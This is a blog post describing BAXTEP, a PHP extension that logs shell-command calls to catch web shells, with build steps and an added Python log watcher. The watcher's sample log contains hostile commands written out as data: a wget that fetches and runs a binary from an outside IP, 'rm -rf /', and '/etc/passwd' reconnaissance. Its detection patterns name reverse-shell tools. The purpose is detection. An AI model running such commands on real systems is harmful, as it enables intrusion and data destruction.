"Once upon a time, in the cold of winter,
We uploaded a mountain of backdoors to the server ..." (admin folklore)

So: on one of the servers a PHP shell was discovered, through which malicious hackers had wrecked the cozy blog of a good person.
After two hours of digging through the Apache logs, the hole through which the shell had been uploaded was found.
The hole was closed, the blog was restored from backups, and we were left with something to think about.
After the third bottle of beer an idea was born: "Why not catch PHP scripts executing system commands?"
The point is that most PHP shells, one way or another, use one of these functions:
- exec()
- system()
- shell_exec()
- passthru()
Accordingly, calls to these functions can be intercepted and quietly logged: on such-and-such a date, such-and-such a line of such-and-such a script called exec() with the argument "rm -rf /".
No sooner said than done. The good man kastigar was handed the spec, and the work began to boil.
I won't go into how he picked up the subtleties of the Zend Engine, but in the end an extension for PHP4/PHP5 was born, codenamed BAXTEP.
At first we did not plan to publish the code, since it was written "for ourselves" and not thoroughly tested, but the open source spirit won out, and the source code was posted on
GoogleCode .
Building and installing:
The extension supports PHP versions 4 and 5.
Requirements:
- packages for PHP4 / PHP5 development (php4-dev, php5-dev)
- gcc
- subversion
Get the source:
svn checkout http://baxtep.googlecode.com/svn/trunk/ baxtep
Build:
cd baxtep
phpize
./configure
make
After the build, take baxtep.so from the ./modules/ directory, put it in extension_dir, and add something like this to php.ini:
;;;;;;;;;;
; BAXTEP ;
;;;;;;;;;;
; Load extension
extension=baxtep.so
; Absolute path to logfile. File must exist and have write access for php
baxtep.logfile = "/tmp/baxtep_messages"
You need to create the log file yourself, and PHP scripts must have permission to write to it. The commands below make it world-writable; owning it by the web server user with a tighter mode is enough, but keep in mind that a PHP shell runs as that same user and can truncate the log either way, so ship the log off the host if you want it as reliable evidence:
touch /tmp/baxtep_messages
chmod 777 /tmp/baxtep_messages
That's it: restart Apache, write a test script and look at the log. There will be something like this:
2009-03-13 07:59:05 BAXTEP: system CMDLINE: `pwd` FILE: /var/www/html/test.php on line 5 URI: /test.php
Format:
YYYY-MM-DD HH:MM:SS BAXTEP: <function> CMDLINE: `<command>` FILE: <script path> on line <N> URI: <REQUEST_URI>
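As an added example (not part of BAXTEP or of the original post), here is a small Python watcher for the log format above. It parses each line, checks the calling script against a hypothetical allow-list of scripts that legitimately spawn commands (thumbnailers and the like), and flags everything else, plus any command line that matches typical web-shell patterns. The sample log, the allow-list and the pattern list are constructed for illustration; only the first sample line is the example from the post. One caveat: the post describes hooks on exec(), system(), shell_exec() and passthru(); PHP also has popen() and proc_open(), so check whether your build covers them before treating this log as complete coverage.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Format of one BAXTEP log line, as shown in the post:
# <date> <time> BAXTEP: <func> CMDLINE: `<command>` FILE: <script> on line <N> URI: <request_uri>
# Assumes script paths and URIs contain no whitespace.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) BAXTEP: (?P<func>\w+) "
    r"CMDLINE: `(?P<cmd>.*)` FILE: (?P<file>\S+) on line (?P<line>\d+) "
    r"URI: (?P<uri>\S*)$"
)


@dataclass
class Event:
    ts: str
    func: str
    cmd: str
    file: str
    line: int
    uri: str


def parse_line(line: str) -> Optional[Event]:
    """Return an Event for a well-formed BAXTEP line, or None for anything else."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    return Event(m["ts"], m["func"], m["cmd"], m["file"], int(m["line"]), m["uri"])


# Hypothetical allow-list: scripts that are expected to spawn commands.
ALLOWED_SCRIPTS = {"/var/www/html/lib/thumbs.php"}

# Constructed patterns for command lines typical of web shells; tune per site.
SUSPICIOUS = [
    ("destructive", re.compile(r"\brm\s+-rf\b|\bmkfs\b|\bdd\s+if=")),
    ("recon", re.compile(r"\b(id|whoami|uname\s+-a|cat\s+/etc/passwd)\b")),
    ("download", re.compile(r"\b(wget|curl|fetch)\b")),
    ("shell-spawn", re.compile(r"\b(nc|ncat|bash\s+-i|perl\s+-e|python\s+-c)\b|/dev/tcp/")),
    ("chained", re.compile(r"[;&|]")),
]


def classify(ev: Event, allowed_scripts: Iterable[str] = ALLOWED_SCRIPTS) -> List[str]:
    """List the reasons an event is worth a look; an empty list means it looks legitimate."""
    reasons: List[str] = []
    if ev.file not in set(allowed_scripts):
        reasons.append(f"unexpected script {ev.file}")
    for name, pattern in SUSPICIOUS:
        if pattern.search(ev.cmd):
            reasons.append(name)
    return reasons


def scan(lines: Iterable[str],
         allowed_scripts: Iterable[str] = ALLOWED_SCRIPTS) -> Tuple[List[Tuple[Event, List[str]]], int]:
    """Parse all lines; return (alerts, number of non-empty lines that did not parse)."""
    allowed = set(allowed_scripts)
    alerts: List[Tuple[Event, List[str]]] = []
    unparsed = 0
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev is None:
            unparsed += 1
            continue
        reasons = classify(ev, allowed)
        if reasons:
            alerts.append((ev, reasons))
    return alerts, unparsed


# Constructed sample log; the first line is the example from the post.
SAMPLE_LOG = """\
2009-03-13 07:59:05 BAXTEP: system CMDLINE: `pwd` FILE: /var/www/html/test.php on line 5 URI: /test.php
2009-03-13 08:01:12 BAXTEP: exec CMDLINE: `convert in.jpg -resize 100x100 thumb.jpg` FILE: /var/www/html/lib/thumbs.php on line 42 URI: /gallery.php?id=7
2009-03-13 08:03:40 BAXTEP: shell_exec CMDLINE: `id; uname -a; cat /etc/passwd` FILE: /var/www/html/uploads/c99.php on line 1 URI: /uploads/c99.php?cmd=id
2009-03-13 08:04:02 BAXTEP: passthru CMDLINE: `wget http://198.51.100.7/x -O /tmp/x; chmod +x /tmp/x; /tmp/x` FILE: /var/www/html/uploads/c99.php on line 1 URI: /uploads/c99.php
2009-03-13 08:05:00 BAXTEP: exec CMDLINE: `rm -rf /` FILE: /var/www/html/uploads/c99.php on line 1 URI: /uploads/c99.php
this line is not a BAXTEP record and is counted as unparsed
"""

if __name__ == "__main__":
    found, bad = scan(SAMPLE_LOG.splitlines())
    for ev, why in found:
        print(f"{ev.ts} {ev.func}() in {ev.file}:{ev.line} via {ev.uri}: {ev.cmd!r} -> {', '.join(why)}")
    print(f"{len(found)} alert(s), {bad} unparsed line(s)")
```

Run it against /tmp/baxtep_messages (for example `scan(open('/tmp/baxtep_messages'))`) from cron or a log tailer. The allow-list is the part that does most of the work: on a typical site only a handful of scripts have any business calling these functions, so a command from an unknown script, above all one under an upload directory, is worth looking at regardless of what it ran.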
UPD: l0rda has built packages for CentOS 5 (i386 and x86_64); you can download them here:
rpm.l0rda.biz/CentOS/5/RPMS/i386 , key:
rpm.l0rda.biz/L0RDA-KEY